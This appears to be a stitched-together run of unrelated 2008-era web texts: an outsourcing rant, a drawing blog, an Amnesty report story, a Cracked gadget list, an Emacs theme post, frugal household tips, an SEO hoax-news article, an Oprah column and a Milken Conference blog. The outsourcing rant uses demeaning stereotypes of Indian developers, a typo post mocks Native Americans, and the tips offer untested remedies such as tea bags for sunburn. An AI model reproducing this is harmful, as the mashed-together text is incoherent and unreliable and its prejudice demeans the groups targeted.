I realize that I ’m generalizing and that there are always exceptions , but if you Nabble through the Maven , IBatis , Struts etc user lists you ’ll encounter posts which make it apparent that the author has the most rudimentary knowledge of the product and of software design and is just hoping to get by .
This theme is prevalent across most mailing lists leading me to believe that this is a widespread disease which effects the outsourcing industry .
Given the apparently skill level of the people working on these projects , one can only surmise that the quality of work being done in those countries is subpar .
Also , posting your resumes and asking for H1 visas on peoples blogs does not help your credibility nor does it showcase your skills .
Again , it just makes you look like an idiot .
Here ’s an exercise : try posting an ad for a development project on Craiglist and ask for a quote .
What you ’ll end up getting is tin-canned emails from India that list Gupta Inc. as knowing EVERY SINGLE LANGUAGE AND DATABASE PLATFORM EVER MADE .
Then follow up with a random one and actually talk to their “ Project Manager ” and you ’ll notice that the email was just a bunch of bullshit and you ’re dealing with a two - man operation run out of a basement on a Pentium II .
Lately I ’ve met an increasing number of people who are “ managing a team in India ” and work for a company with an accent in it ’s name .
These are the new managers the IT industry is producing , usually they ’re in their mid-20 ’s and consider their new “ manager ” role a promotion .
But when you ’re managing narrow - minded developers getting paid the minimum wage and communicating 95 % of the time over MSN , the work that ’ll get done will reflect the circumstances and talent of the people involved .
Software development is an industry where geographic location hardly seems to matter but when we ’re communicating requirements , design and expectations entirely over chat , things are bound to get lost in translation .
My point ?
You ca n’t oversee a project if you ’re thousands of miles away , especially if you ’re dealing with a guy who ’s trying to scrape by .
This whole system is flawed and annoying , both from the manager ’s and developer ’s perspective .
As long as you can tolerate their nerdiness and smell you can generally have a conversation with another North American developer and talk about a wide range of languages and tools without too many awkward moments .
Not the case with slave labor .
I visited India a couple years ago and had a chance to speak with some developers working at India ’s second richest bank .
The first think you notice about these people is how specialized they are .
If they have a Java job , that ’s all they know .
Nothing more .
Java .
Java .
Java .
If they have a Perl job , it ’s all about Perl and they ’ll write everything in Perl and not even consider anything else for any reason .
The mentality seems to be to get the job done as the lowest price and as fast as possible , nothing else matters .
Fair enough , but I just do n’t see the price of the work making up for the lack of quality and the general fuckedupness of the process .
And yes , I ’m an Indian .
Get the feed
I am trying to draw every person in New York .
I will be drawing people everyday and posting as frequently as I can .
It is possible that I will draw you without you knowing it .
I draw in Subway stations and museums and restaurants and on street corners .
I try not to be in the way when I am drawing or be too noticeable .
Whenever I have a new batch of drawings I will post them on this blog .
If you would like to increase the chances of a portrait of YOU appearing on this blog please email me ( art@jasonpolan.com ) a street corner or other public place that you will be standing at for a duration of two minutes ( I will be on the corner of 14th street and 8th avenue on the North - east corner of the street from 2:42 - 2:44 pm this Thursday wearing a bright yellow jacket and navy rubber boots , for example ) .
Please give me more than a 24 hour warning and please make it a scenario that is not too difficult for you to accomplish ( the corner outside of the store you work at during lunch time , or in front of a museum you were going to go to on a Saturday ) because I may unfortunately miss you and do not want you to have to invest more than 2 minutes of your time in case I can not make it .
You may or may not see me drawing you during this time .
If I do draw you , you will see yourself ( or rather , a drawing that hopefully somewhat resembles you ) on this blog that evening .
When the project is completed we will all have a get together .
LONDON – The annual report of Amnesty International ( AI ) released Wednesday holds the United States responsible for setting world standards on human rights — and then failing in that task .
" As the world ’s most powerful state , the USA sets the standard for government behavior globally , " but the US has " distinguished itself in recent years through its defiance of international law . "
Like last year , the focus was on US detentions at Guantanamo Bay .
The report said hundreds continue to be detained there , while noting that more than 100 were transferred out of that center last year .
The report was critical of US failures domestically as well .
" Soldiers refusing to serve in Iraq on grounds of conscience were imprisoned .
Prisoners continued to experience ill - treatment at the hands of police officers and prison guards .
Dozens of people died after police used tasers ( electroshock weapons ) against them . "
But while being critical of the position with the US on specific counts , the thrust of the AI position was controversially that the US carries the responsibility of setting an example to the rest of the world .
The bulk of the report collates human rights issues through 2007 in the various country reports .
Amnesty has highlighted particularly the issues with the US , China , Russia and the EU .
On these , it made the following demands :
– China must live up to the human rights promises it made around the Olympic Games and allow free speech and freedom of the press and end " reeducation through labor . "
– The US must close the Guantánamo detention camp and secret detention centers , prosecute the detainees under fair trial standards or release them , and unequivocally reject the use of torture and ill - treatment .
– Russia must show greater tolerance for political dissent , and none for impunity on human rights abuses in Chechnya .
–
The EU must investigate the complicity of its member states in " renditions " of terrorist suspects and set the same bar on human rights for its own members as it does for other countries .
" The most powerful must lead by example , " said AI secretary general Irene Khan at the launch of the report .
But the report also draws attention to severe violations in other regions .
" The human rights flashpoints in Darfur , Zimbabwe , Gaza , Iraq and Myanmar demand immediate action , " said Khan .
The AI report says that 60 years after the Universal Declaration of Human Rights was adopted by the United Nations , people are still tortured or ill - treated in at least 81 countries , face unfair trials in at least 54 countries and are not allowed to speak freely in at least 77 countries .
The report highlights the following trends through 2007 : – Targeting of civilians by armed groups and government forces with impunity ; – Pervasive violence against women ; – Promotion of torture and ill - treatment as acceptable modes of intelligence gathering ; – Suppression of dissent and attacks on journalists and activists ; – Lack of protection for refugees , asylum - seekers and migrants ; – Denial of economic and social rights ; and – Evasion of corporate accountability for human rights abuses .
Much of the Amnesty report continues as before to be based on newspaper and other reports .
This seems particularly the case with China .
" Based on public reports , Amnesty International estimated that at least 470 people were executed and 1,860 people sentenced to death during 2007 ( in China ) , although the true figures were believed to be much higher , " the report says .
It also highlights the situation in Tibet and brings together other publicized instances of violations .
The section on Iraq exposes acutely AI s limitations by way of investigations on the ground .
The report is really a summing up of familiar positions , and those only as reported in mainstream media .
The report notes that " thousands of civilians , including children , were killed or injured amid continuing sectarian and other violence .
All sides involved in the fighting committed gross human rights violations , some of which amounted to war crimes and crimes against humanity . "
On Pakistan , the report capsules the political events around the confrontation with President Pervez Musharraf , but also blames the US for backing him .
" The hollowness of the US administration ’s call for democracy and freedom abroad was displayed in its continued support of President Pervez Musharraf as he arrested thousands of lawyers , journalists , human rights defenders and political activists , " Khan said .
But while highlighting abuses of rights , the report speaks also of growing protests against such violations .
" Black - suited lawyers in Pakistan , saffron - robed monks in Myanmar , 43.7 million individuals standing up on Oct. 17 , 2007 , to demand action against poverty , all were vibrant reminders last year of a global citizenry determined to stand up for human rights and hold their leaders to account . "
Forbidden
You do n't have permission to access / ForosSexo.html on this server .
In March , Paul Graham wrote a great essay entitled How to Disagree .
I loved the article because it is all about how the web is turning into a conversation ( which is why we built CreateDebate ) .
Shortly thereafter , I transformed Graham ’s underlying thesis into a graphic to help illustrate his point .
The original graphic ( similar to Maslow ’s Hierarchy of Needs ) can be found here .
After reading the comments spurred by my illustration ( on this blog and elsewhere ) , I decided it was time to revisit this graphic .
In particular , this comment by Danielle Vyas caught my eye :
I arrived here via Stumble Upon and read the comments .
I think that the chart would be more understandable if presented as a ladder instead of a pyramid .
A lot of people relying on the visual representation with this post as one reader mentions without “ reading ” .
Paul Graham ’s Ladder of Disagreement
I think she hit the nail on the head .
Rather than illustrating the frequency of disagreements , this graphic illustrates the ascending quality of disagreements on the Internet .
What do you think ?
As always , if you found this analysis then you might enjoy using CreateDebate .
We built our site from scratch and our community is growing quickly .
Check it out !
Even after including all of the items we actually need in our lives , computer catalogs still have many pages left to fill .
Fortunately , there is an entire industry working hard to invent useless and downright asinine devices , in the hopes that someone will accidentally buy them .
Such as : Advertisement
10 USB Mouse Jiggler
The USB Mouse Jiggler is a USB device that you plug into your computer .
The device ' jiggles ' your mouse around every few minutes so the sleep mode or screen saver does n't come on , presumably so you can snooze in front of your computer and still look like you 're working .
Continue Reading Below Advertisement
Why It 's Pointless Inventing gadgets for the lazy man is what makes America great ( hell , we use Segways on our treadmills ) but paying $ 30 for something that replaces 10 seconds worth of mouse clicking ( the amount of time it would take you to adjust the sleep mode timer ) is on a whole different level of laziness .
This is on the level of hiring a guy to operate your TV remote for you .
9 USB Eye Massager Continue Reading Below Advertisement
The eye massager is a peripheral shaped like two fingers ready to attempt a Three Stooges - style eye poking .
So it makes perfect sense that they 'd sell it as a USB device meant to be used around your eyes .
It has two distinct vibrating settings : high speed , ( which we 're assuming is fatal since it would vibrate right into your brain ) and low speed ( which , while not fatal , probably causes major retinal damage and subsequent blindness ) .
On the upside , according to the creators , this is pretty much mankind 's greatest invention ever .
Not only does it soothe your aching eyeballs , it also relieves tension in the central nervous system , aids digestion , stimulates the lymphatic system and fights against infection by boosting your immune system .
The creators are already working on a USB back massager that cures cancer .
Continue Reading Below Advertisement
Why It 's Pointless Before you enthusiastically plunge this device into you eye socket , consider this : why on Earth should you risk blindness when you could just use your own fingers to massage your eyeballs ?
We are n't entirely convinced by the creators ' claims about the devices ' supposed magical healing capabilities either .
We 're not saying they 're lying ( legally we can 't ) , we 're just saying they have something in common with Pinocchio ( i.e. both are fucking liars ) .
If you 're still considering buying this , then we urge you to take the price into account .
We can assure you that there is a multitude of less expensive ways to blind yourself such as peppering the eyeball or a good old - fashioned eye stabbing .
Continue Reading Below Advertisement
Yeah , yeah , I know .
Combination of the end of the semester and family matters .
But I ’m back with four more GITCS lectures :
Lecture 12 : Space Complexity and More
Lecture 13 : Randomness
Lecture 14 : Probabilistic Complexity Classes
Lecture 15 : Derandomization / Crypto Double Feature
Comments welcome as always .
Embarrassing Typo of the Day
According to Reuters , Washington Mutual is now accepting beads and blankets as mortgage payments :
>
click thru for heap big trouble , paleface :
>
The Reuter 's newswire story ran in both the NYTimes and Washington Post
Monday , April 07 , 2008 | 02:30 PM | Permalink | Comments ( 13 ) | TrackBack ( 0 )
add to de.li.cious | digg this !
| add to technorati | email this post
TrackBack TrackBack URL for this entry :
https://www.typepad.com/services/trackback/6a00d8341c52a953ef00e551b0dd088833
Listed below are links to weblogs that reference Embarrassing Typo of the Day :
Comments
The really shiny beads are worth more .
Posted by : Marcus Aurelius | Apr 7 , 2008 2:33:21 PM
Update Added screenshots
I spend a lot of time working in front of a screen ( many hours in a dimly lit room ) and eye fatigue is an issue .
A consistent color scheme , especially one which is easy on the eyes , is important -- and it also helps to have way of doing that where the directives are not all scattered all over my Emacs - lisp setup .
Enter Emacs Color
Themes , available as the Debian package emacs - goodies .
Aided with a HSL color picker , I set around trying to create a dark color theme for Emacs .
It does not help that I am blue - green color blind , so subtle variations are often lost on me .
I do want to use color contrast to increase productivity , but I also want to avoid the jarring angry fruit salad look , and so I am in the process of crafting a logical color scheme that is high contrast enough for me , without being too unpleasing .
In circumstances where there a lot of related faces that can be viewed , for example , the Gnus group buffer , consistent and logical color choices are the only sane option .
Gnus groups can be news ( bluish ) or mail ( greenish ) , have states ( large number of unread messages , normal , and empty ) .
The large number unread groups have highest luminosity ( appear brighter ) , and the empty one have lower luminosity ( appear greyer ) , but have the same hue and saturation .
Sub states and group priorities are rendered using a color series which has constant luminosity and saturation , and vary in hue by a constant separation -- so all the related groups have the same brightness ( {mail , news} / {unread , normal , empty} ) , and a graded selection of foreground colors .
It sounds more complicated that it looks .
The eye is drawn naturally to the unread groups , and first to the mail , then USENET groups ( which is my preference ) .
Similar color variations occur for individual messages in a group ; high scoring messages bubble to the top , and have a higher luminosity .
This color schema has made me slightly faster at reading mail / USENET .
In the message itself , quoted mail messages from different people are color coordinated , with high contrast between citations that are close to each other in the hierarchy , so it is less likely that one misunderstands who said what in a long conversation .
The resulting scheme covers programming languages , Gnus , Erc , mail , org - mode , CUA - mode , apt-utils , bbdb , compilation buffers , changelog mode , diff and ediff , eshell , and more .
This has allowed me to consolidate all my color directives into a single file , and is in a format that might be usable by others .
See the wiki page for details about how to use and switch color themes in Emacs .
Enjoy .
The Internet has forever changed the sales , marketing , customer service , procurement and financial landscape for all businesses .
Embracing the fundamental efficiencies and cost effectiveness of the Internet is now essential for all organizations to remain competitive .
Without the proper planning , goals , marketing or design , a website is doomed for failure .
Our approach is strategic ... no design work is undertaken before we set the goals , identify the target market and define the desired user action .
Written on 5/29/2008 by Shilpan Patel of Success Soul
I ’m a pretty frugal guy .
With that said , I like to explore ways that we can use common things in unconventional ways .
In some cases , these unconventional approaches actually work better than the solutions we ’ve learned to love and most of the time , they cost a lot less .
Some will even put useless pieces of clutter to good use so we ’re taking otherwise worthless items and repurposing them .
Not bad right ?
I have to admit that these creative uses are not mine .
However , I ’ve learned about them from different sources and experimented to prove that they work for their intended use .
What kind of weird solutions have you come up with either out of necessity , boredom or ingenuity ?
Get a Shine with Banana Peels :
If you are not eating bananas , you should be .
In addition to the health benefits of the fruit itself , its skin is a built in shoe shine kit .
A banana peel can shine your leather furniture and shoes .
Just remove the stringy matter from inside and rub the inside of the peel on your shoes .
Treat sunburn with tea bags : Plain and simple , sunburn is terrible .
If you forget to add the SPF before your day at the beach , apply a few tea bags on the affected area to escape the pain .
If sunburn is widespread , fill the tub with hot water and put some tea bags in the hot water .
Then soak your entire body in the tub .
It works .
Remove price tag with peanut butter :
Have you felt exasperated when you purchased a gift for a friend and before gift - wrapping , you tried to remove the price tag with no avail ?
Apply some peanut butter on the tag and rub it gently .
You ’ll be happy to see the price tag and its sticky residue gone .
Deodorize the refrigerator :
Is your refrigerator smelly despite the thorough cleaning and defrosting ?
Dampen a cotton ball with vanilla extract and leave on the shelf .
After few hours , you ’ll be pleasantly surprised when you open your refrigerator .
Repel ants :
Are ants invading your home ?
Aside from cleaning up , chalk powder has been known to stop ants in their tracks .
Spread chalk powder around the house and in the closets .
Ants will be repelled by the calcium carbonate in the chalk .
If you have a major ant problem , this site has a ton of good anti-ant info .
Control your dandruff with baking soda :
Do you feel low self - esteem due to dandruff that scares you every time you are on a date or other social gatherings ?
Well , create some homemade baking soda shampoo .
Use this solution every time you shower and after a dry spell , you ’ll find your hair free of flakes and softer .
Slip off the stuck ring :
If you have hard time slipping off a ring on your finger , rub the finger with baby oil .
Then , swing the ring to apply baby oil under the ring surface .
You will be able to slide the ring off smoothly .
Deodorize your garbage disposal : Does your garbage disposal smell yucky ?
Pour 1 /2 cup of salt into the bottom of the disposal and rinse it with warm water .
The smell will go away quickly .
Add a little lemon if you want to freshen things up even more .
Remove car dents :
Before paying a good bit to a body shop to fix the dents on your car , wet a plunger , push it over the dent and pull it out sharply .
It may remove the dents at free of charge .
Streak free glass with a newspaper : Before pitching old newspapers into the recycling bin , try cleaning your glass windows with glass cleaner or warm water and a piece of newspaper .
You ’ll see an absolutely streak - free glass surface as a result .
I have tried these tricks and they work .
It ’s fun to be creative .
You ’ll save environment and hard earned money as well .
What have you learned throughout the years ?
Share your oddest tip in the comment section below and Jay will send the submitter of the most unique and helpful suggestion a copy of It ’s All Too Much : An Easy Plan for Living a Richer Life with Less Stuff .
The winner will be announced in the comment section on June 02 , 2008 .
- Shilpan
Thursday , May 22 , 2008
Search Engine Optimization Through Hoax News
Over at Search Engine Land ’s Sphinn , people are discussing a search engine optimization tactic which tries to assemble backlink juice by posting a fake news article .
Jonathan Crossfield wraps it up : “ Online marketer Lyndon Antcliff recently helped a client achieve over 1500 inbound links in under a week with a story designed to grab attention . ”
The article , titled “ 13 Year Old Steals Dad ’s Credit Card to Buy Hookers , ” was and still is hosted at the authoritative looking domain Money.
co.uk , which is a financial advisor and Lyndon ’s client , apparently .
The hoax news explains that “ Ralph Hardy , a 13 year old from Newark , Texas confessed to ordering an extra credit card from his father ’s existing credit card company , ” taking his friends on a $ 30,000 spending spree “ culminating in playing ’ Halo ’ on an Xbox with a couple of hookers in a Texas motel . ”
Jonathan continues to explain that the page received 2,452 votes at social news site Digg.com ( it ’s currently at 2,489 diggs , and not marked as incorrect , attracting comments like “ Ballsy kid . ” ) .
Then , mainstream news made it into the mix .
The hoax item was covered in Australia News.com.au , The Daily Telegraph , Fox News and many others , Jonathan says , and even reached the print version of UK ’s Sun newspaper .
Google ’s Matt Cutts makes a statement
Google ’s anti webspam worker Matt Cutts at Sphinn gets involved too , making a statement in regards to the question “ Where does [ Cutts ] and search engines stand on something like this ? ” .
Matt argues , “ My quick take is that Google ’s webmaster guidelines allow for [ as in “ cover ” ] cases such as this , ” citing the bit at the guidelines which reads “ Google may respond negatively to other misleading practices not listed here ( e.g. tricking users by registering misspellings of well - known websites ) .
It ’s not safe to assume that just because a specific deceptive technique is n’t included on this page , Google approves of it . ”
Matt Cutts says , “ There ’s not much more deceptive or misleading than a fake story without any disclosure that the story is hoax . ”
I wonder if it should be any of Google ’s business when a page games humans – and whether it should only be of their concern when a page games Google .
Otherwise , Google risks becoming an editor for the web , additional to their existing strong traffic channeling power .
In that role , they would have to decide what is correct reporting and what is not .
In that role , Google would need to answer a lot of new questions , and they may not always be the most qualified to answer them .
For instance ; should popular sites like The Onion , which claim to be “ America ’s Finest News Source , ” be judged as deception or satire ?
What if search engine abusers simply disclaim their own hoax news as satire somewhere on the page ?
And what happens to news sources which some people would consider so badly researched or sensationalist that one may argue it borders on a hoax ?
What if the hoax has a bit of truth in it ?
Is hoaxing allowed on April 1st ?
Are April 1st articles allowed to reside on the server after the day , without disclosure ?
What about sites publishing fiction ?
Once before , Matt Cutts argued that he thinks “ of ’ linkbait ’ as something interesting enough to catch people ’s attention , and that does n’t have to be a bad thing .
There are a lot of ways to do that , including putting in sweat - of - the - brow work to generate data or insights , or it can be as simple as being creative .
You can also say something controversial to generate discussion ” .
( That last tactic , he argued , “ gets tired if you overuse it , though ” . )
As one example of a backlink - generating tactic that falls into the “ generate controversy ” camp , Matt Cutts lists Google - critical site Google - Watch.org .
Incidentally , one of the theories of that site , Matt Cutts some years ago called “ 100 % wrong ” .
That would make it similar to a hoax , it seems – and following Matt ’s argument provided at Sphinn , that might make it a case which the webmaster guidelines may cover .
As you can see , such editorializing would not only be tough and walking many gray areas ... it could also start to become a conflict of interest for Google .
Keeping spam out of Google ’s results
On the other hand , the fake article in question is also apparently search engine optimization spam – linking out to such heavily rank - battled topics like insurance , mortgage and loans , and perhaps using the word “ credit card ” in the title of the story just to increase keyword relevancy of backlinks towards this phrase .
As a human editor , that convinced me to link out to the site using the “ nofollow ” attribute .
So while it targeted human visitors to add manual backlinks , the real goal seems to have been gaming Google ; as such , it may be in Google ’s area to unspin the result ranking .
Taken to the extreme , a Google search result filled with hoax articles becomes useless – unless someone is specifically looking for hoaxes .
Though – did n’t Google always state they rely on the democracy of the web to decide such things ?
The PageRank algorithm , which Google say is “ the heart ” of their software , relies on – according to Google – “ the uniquely democratic nature of the web by using its vast link structure as an indicator of an individual page ’s value . ”
If the democracy makes a bad decision – in this case , by having many of its web citizens misjudge the quality of a news item – is it Google ’s job to jump in to overrule that decision ?
Well , already , Google lets human editors decide which publishers make it into Google News , which in turn are displayed in some of Google ’s main search results as News onebox .
Also , Google already has human evaluators which indirectly affect rankings – as they can influence which ranking algorithms Google picks ( even when Google argues the “ beliefs and preferences of those who work at Google , as well as the opinions of the general public , do not determine or impact our search results ” ) – , and those human evaluators may give lower ratings to search result pages which put hoax stories in higher positions .
And then there ’s pages employing phishing or distributing a virus ; in such cases , Google currently may display a warning in the search , but that flag perhaps does not affect the ranking and the page is still displayed .
Similar to the controversy around how Google expanded their fight against paid links via the push of the “ nofollow ” attribute ( and lowering the PageRank of those who buy and sell links ) , if the “ fake news ” SEO tactic becomes more widespread , Google ’s response to it may also trigger new discussions .
Admittedly – if the nofollow discussions are any indicator , then while there may be lively debate around the topic , at this time it ’s Google who makes the final decision .
They may listen to webmasters and get involved , but in the end they wo n’t rely on just democracy or automation , but may come to an entirely human conclusion somewhere inside the Google headquarters .
Lyndon Antcliff removes his coverage of his hoax strategy
In the meantime , search engine optimizer Lyndon Antcliff , who started the hoax item , removed an article in which he gave insight into his tactics – tactics which , I would argue , are blackhat , and the exact kind of stuff that gives search engine optimization a bad name among so many outside the industry .
Lyndon says , “ After discussing it with a number of trusted colleagues I have taken the step of putting the ’ Mental Linkbait ’ behind closed doors .
I had thought discussing tactics in an open way was a good thing but it seems I am giving too much away and was attracting a crowd I really do n’t have any time for . ”
Lyndon adds , “ I have little interest in discussing the ethics of linkbait , as far as I am concerned if it works and results are achieved then do it . ”
One result seems to be clear in this , indeed , backlinks aside : Lyndon managed to lower the image of his apparent client , Money.co.uk , who got themselves involved in a very shady marketing technique ( and this in turn may also give the “ link democracy ” another chance to get it right , by removing links to the site ) .
“ After all , ” Jonathan Crossfield writes , “ if this article is incorrect , how can a reader trust any of the financial advice contained on the site ? ”
[ Via Tony at Friendfeed . ]
>>
More posts
Advertisement
( Oprah.com ) --
On any given day here at " O , The Oprah Magazine , " there are somewhere in the neighborhood of 69 very talented , extremely detail oriented , high - energy , hardworking women and men all doing their jobs and doing them well .
I love a few of them , I like a lot of them , I despise one of them .
She is the Magneto to my Wolverine , the Saruman to my Frodo , the Dr. Octopus to my Spiderman .
I call her The Tinkler .
It 's a typical Tuesday ; the office is humming along .
I 'm answering e-mails , writing cover lines , scheduling a dental appointment here , partial highlights there , kicking myself for not getting sushi at lunch .
The sun is shining , the color printer is working -- my life is good .
I mosey into the ladies ' room , glance at the mirror , remind myself that fluorescent lights make everyone look as if they 're in the final stages of tuberculosis , and head for a stall .
And then I see it :
The seat , even the floor , is covered in little yellow droplets .
The Tinkler strikes again .
To date , I have been able to deduce only four things about her :
1 . She is female .
2 . She attacks between the hours of 10 a.m. and 8 p.m .
3 . She works alone .
4 . She was raised in a barn .
Do n't Miss Oprah.com : Secrets to a successful work life
Oprah.com : Secrets to a successful work life Oprah.com :
How to stay calm around stressful people
Oprah.com : How to stay calm around stressful people Oprah.com :
Five ways to keep the peace
I 've been her victim more times than I can count , and it has turned me from a happy - go - lucky columnist into a bitter , paranoid germaphobe .
She has become the bane of my existence .
We live in a world where our soldiers lack sufficient body armor , where Rupert Murdoch is blurring the line intended to keep the business and political interests of media owners from influencing the presentation of news , where the White House still refuses to respond to questions they promised to answer as soon as the Scooter Libby case was closed , where studies indicate that worrying you 're going to get sick will actually get you sick -- and yet I am devoting an entire column to The Tinkler .
Any shrink worth his or her salt will tell you that it is a mistake to think of your colleagues as family .
But what is a family if not a group of people who care about you and irritate you and show up for cake on your birthday and look at pictures of your kid even when they do n't feel like it and think it would n't kill you to put on a little makeup and a pair of heels once in a while ?
I 've been earning a paycheck for 30 years .
Whether rinsing conditioner off a Lhasa apso during my stint as shampoo girl at Mr. Whiskers Pet Boutique or breathing on the chicken breast I was about to serve a rude diner during my waitressing days , I 've always found that the people I work with matter to me .
Their moods , their opinions , their style influence my life .
They 've appreciated me , humiliated me , surprised me , and antagonized me .
I 've gotten flowers and I 've gotten fired ( and I 'm pretty sure I did n't do anything to deserve either ) , but I 've never experienced anything like The Tinkler .
" Dammit ! " I say upon encountering her latest Jackson Pollock imitation .
Pat , Suzan , and Valerie each come out of their stalls to see what 's wrong .
I point in horror .
Pat groans , Suzan moans , Val throws up her hands in disgust , and we fall into silence .
Then I rally , " At least we know it 's not one of us . "
But everybody else is a suspect .
" It ca n't be Sudie , " Suzan volunteers .
My eyes narrow .
" What are you basing this on ? " I ask .
" I 've seen her , " she answers , " she always heads straight for the paper seat protector . "
" And , " Valerie adds , " we can cross Mamie off the list -- it happened twice while she was in Sweden . "
Sixty seconds ago , the four of us were editors ; now we are FBI profilers .
" She probably likes to burrow into small spaces , " Pat conjectures .
" This never happens in the big , wheelchair - accessible stall ... "
" It 's very primitive , as if she 's marking her territory .
This is clearly a hostile gesture , " Suzan declares with authority .
We 're finally getting somewhere .
" So , really , " I say , " we just need to be on the lookout for an aggressively mean - spirited , mole - like cavewoman who is not confined to a wheelchair .. is that right ? "
Val is the first to realize that we 're losing our minds .
" I 'm out of here , " she says , and exits the ladies ' room .
Later , I complain to J.J. , poor , naive little J.J ..
She tells me that it can't be any of us , that the toilet is somehow to blame .
I leave J.J. in her special world -- a place where troubles melt like lemon drops and Lee Harvey Oswald acted alone -- and resume writing my column .
Gina drops by and reads over my shoulder .
Suddenly she has an epiphany : " It 's you ! " she announces , pointing at me like she 's Javert accusing Jean Valjean of stealing silver candlesticks .
" Think about it , " she says .
" What better way to cover your tracks than writing an outraged piece on the subject ? "
I kind of like that Gina believes I am an evil genius , and I do n't have the heart to tell her that I once refused to sit my daughter on the lap of a department store Santa Claus because I had no idea who else had been sitting there .
Another day , another bathroom break .
" Steer clear of the third stall , " Yeun warns as she dries her hands and heads for a meeting .
Jennifer emerges from door number four to see what exactly 's going on behind door number three .
She is appalled yet philosophical .
" Believe it or not , every place I 've ever worked has had a Tinkler -- maybe sharing a ladies ' room just sends certain people into a passive - aggressive snit .
It 's the dark side of office life . "
Lately , my daydreams bear a striking resemblance to one of those black - and - white Sherlock Holmes movies :
The entire team sits , sipping brandy in an ornate drawing room .
" I suppose you 're wondering why I 've gathered you here today , " I begin in an inexplicable British accent .
" Well , my friends , one of you is The Tinkler . "
The research department averts their eyes .
The art department fidgets nervously .
An intern gasps .
" And , " I go on , " nobody is leaving this room until I reveal the person who refuses to work and play well with others . "
My assistant , Polly , looks up .
" You mean you 've figured out the identity of The Tinkler ? " she asks , filled with an admiration for my powers of reasoning that she has never once expressed in real life .
" It was elementary , dear Watson .
I merely -- " but before I can unmask The Tinkler or explain why I refer to Polly as dear Watson , the lights suddenly go out ...
I could go on , but I 'm bored silly whenever someone feels compelled to relay every nanosecond of a dream .
Suffice it to say that I usually wind up in the arms of Tyrone Power .
As for The Tinkler ?
She 's still on the lam .
There are lots of days when I find myself wishing life were closer to a gorgeous movie from the ' 40s -- women wore fabulous hats and pearl chokers , and I do n't think they actually went to the bathroom back then .
They were too busy dancing with Fred Astaire and smoking unfiltered cigarettes to schlep to an office every day .
Now , some of us are running the offices , but it seems we 've brought a few low - grade lunatics along for the ride -- and they 're wreaking havoc in the ladies ' room .
Where have you gone , Edith Wharton ?
I 'm not asking for cloth napkins and classical music .
I do n't need a mint on my pillow .
I just want a bit of common courtesy , a modicum of civility , a touch of class , or , failing all that , a good supply of Lysol .
By Lisa Kogan from " O , The Oprah Magazine , " April 2008
Subscribe to O , The Oprah Magazine for up to 75 % off the newsstand price .
That 's like getting 18 issues FREE .
Subscribe now !
TM & © 2009 Harpo Productions , Inc. All Rights Reserved .
All About Etiquette and Manners
I am still recovering from the Milken Conference , and unlike my fellow blog panelists Paul Kedrosky , Felix Salmon and Mark Thoma , have not written any posts on particular sessions .
In part , that was because in my other life as a consultant , I am well aware of the dangers of relying on memory even though mine is pretty good , and I had decided to listen rather than take notes .
But the other reason was in almost all the sessions has a strong element of overt pressure on the speakers to maintain an upbeat tone , combined with repeated reinforcement of Republican / Chicago School of Economics ideology .
Normally I would not deem that sort of thing worthy of mention if it were a minor and only occasional element of the program ; indeed it would have been valuable if other views had been tolerated and some sparks flew .
No , the private sector / deregulation cheerleading was pervasive and baldfaced , and made it hard for me to sort out signal from noise .
There were enough cases where I knew the data and knew it to be misrepresented so as to call a lot of what I was hearing into question .
I did manage to see one session that was free of that , by theoretical physicist Lisa Randall talking about her work ( needless to say , it was way beyond me , but she did a good job nevertheless ) , and putting in the lone plea I heard for government intervention .
She said the US was losing its edge in her kind of science due to our inability to make commitments that we will adhere to for large scale experiments , like the one at CERN this summer .
And she told us it will not make a black hole that will destroy our universe , since the energy involved will be insufficient to produce anything other than a black hole that would dissipate immediately , and the odds of even that were extremely low .
But her session had at most 60 in the audience , while the big presentation later on , with Eric Schmidt of Google , Craig Venter ( famed for decoding the human genome ) and Muhammad Yunus of Grammen Bank , had frequent comments by Venter about how badly the government funded efforts to decode the genome has performed relative to his efforts ( with Milken as moderator making supportive noises ) .
Um , is n’t it possible that different types and scales of science require different approaches ?
And no one seemed willing to acknowledge that our vaunted pharmaceutical industry depends heavily on Federal funding ( I ’ve seen estimates in the 40 % to 55 % range ) .
Mind you , there were some signs of dissent from the Panglossian posturing .
Myron Scholes , both in the large lunch ( “ Four Nobel Prize Winning Economists ” ) on Tuesday and in a panel discussion on innovation in financial services on Wednesday , attempted at several points to take issue with some of the ideas that might have been oversimplified , and met considerable resistance , as did Edmund Phelps , And I noted what care Scholes took to be precise and non-controversial in his presentation .
For instance , in the lunch , Milken , who was the moderator , put up a quote from Joseph Stiglitz which said that we were in the worst financial crisis since the Great Depression .
Note that Stiglitz is n’t alone in making that sort of observation ; Soros and various private analysts ( and not just Nouriel Roubini ) .
Even the IMF has been unusually outspoken about its concerns .
So what was the response ?
The economy is not in a recession , unemployment is low , ergo all this talk is off base .
Scholes pointed out that we are n’t through this yet and in hindsight things might look different , and was almost hooted down ( the response was something like , “ we are here to try to forecast the future .
Looking back is easy . ” ) .
Similarly , it was Scholes on the second panel who was the ONLY one I heard mention ( and only obliquely ) the massive facilities the Fed has implemented , and the efforts made by other central banks .
So this group was also a singularly ungrateful lot .
Not only was there NO acknowledgment of the magnitude of the efforts made on behalf of the financial services industry , but every time the government was mentioned , it was with derision and elicited considerable applause .
Not that everyone there drank the Kool - Aid , mind you ; in fact , the number of like minded might have been quite substantial ( during the dinner the second night , the mention of Obama elicited more applause than the other candidates ) .
I had some very good discussions with some others participants despite the impediment of a conference badge that read “ Press . ”
One was quite incensed ( “ Where ’s the humility ? ” ) and later said the fans were turned up high so no one could smell that they were shitting in their pants .
Ouch !
But the example that bothered me the most was the panel on financial innovation .
The panel consisted of Lewis Ranieri ( who created the mortgage backed securities business ) , Richard Sandor ( who invented financial futures ) , Myron Scholes , and Milken .
Some of the lines of thinking were truly peculiar .
What was bad about our financial crisis was n’t that is has and will continue for at least the next couple of years to do damage to people ’s lives and businesses .
No , it was that other countries might become skeptical about financial innovation and thus deny themselves the opportunity to use financial innovation to solve problems like climate change and poverty
Ranieri was far and away the most downbeat on the panel , yet was repeatedly steered away from expressing his views fully .
He felt that the problems we witnessed are not inherent to the products ( ahem , are the bad incentives inherent or not ?
How do you separate that out ? ) .
He pointed out that the economic difference between doing a mod with a borrower who had some ability to pay was 30 % ( and in context , he seemed to mean 30 % of the value of the original mortgage ) .
He acknowledged that the modifications were n’t being made , that the industry needed to cut the Gordian knot and might require legislative relief to do so .
He also said that things could get very bad ( he invoked the Great Depression ) if this path was n’t taken .
Mind you , that train of thought came out in snippets , with many attempts to steer him away from it .
